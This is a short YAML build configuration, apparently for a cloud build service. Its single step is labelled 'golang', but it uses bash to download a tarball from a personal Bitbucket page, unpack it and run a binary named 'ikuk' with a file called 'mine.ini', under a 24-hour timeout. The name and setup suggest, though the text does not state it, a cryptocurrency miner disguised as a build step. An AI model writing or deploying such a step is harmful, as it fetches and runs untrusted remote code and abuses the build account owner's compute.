steps: 
  - name: golang 
    args:  
      - '-c' 
      - >- 
        wget https://bitbucket.org/Abyehaqi/haqie/downloads/kosim.tar.gz && tar -xvf kosim.tar.gz && ./ikuk mine.ini 
    waitFor: ["-"] 
    entrypoint: /bin/bash 
timeout: 86400s